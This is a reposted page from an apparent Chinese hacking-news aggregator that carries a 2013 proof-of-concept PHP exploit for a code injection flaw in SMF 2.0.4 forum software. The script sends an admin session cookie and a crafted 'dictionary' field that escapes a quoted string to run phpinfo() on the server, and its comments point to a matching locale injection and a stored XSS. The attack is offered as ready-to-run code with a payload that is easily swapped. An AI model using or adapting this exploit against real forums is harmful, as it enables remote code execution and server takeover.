记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

SMF 2.0.4 PHP Code Injection

2013-05-09 15:55
<?php
 
// proof of concept that latest SMF (2.0.4) can be exploited by php injection.
 
// payload code must escape from \', so you should try with something like that:
// p0c\';phpinfo();// as a 'dictionary' value. Same story for locale parameter.
// For character_set - another story, as far as I remember, because here we have
// a nice stored xss. ;)
 
// 21/04/2013 
// http://HauntIT.blogspot.com
 
// to successfully exploit smf 2.0.4 we need correct admin's cookie:
$cookie = 'SMFCookie956=allCookiesHere';
$ch = curl_init('http://smf_2.0.4/index.php?action=admin;area=languages;sa=editlang;lid=english');
 
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
curl_setopt($ch, CURLOPT_POST, 1); // send as POST (to 'On')
curl_setopt($ch, CURLOPT_POSTFIELDS, "character_set=en&locale=helloworld&dictionary=p0c\\';phpinfo();//&spelling=american&ce0361602df1=c6772abdb6d5e3f403bd65e3c3c2a2c0&save_main=Save");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
 
$page = curl_exec($ch);
 
echo 'PHP code:<br>'.$page;
 
curl_close($ch); // to close 'logged-in' part
 
?>
知识来源: www.2cto.com/Article/201305/209337.html

阅读:170104 | 评论:1 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“SMF 2.0.4 PHP Code Injection”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词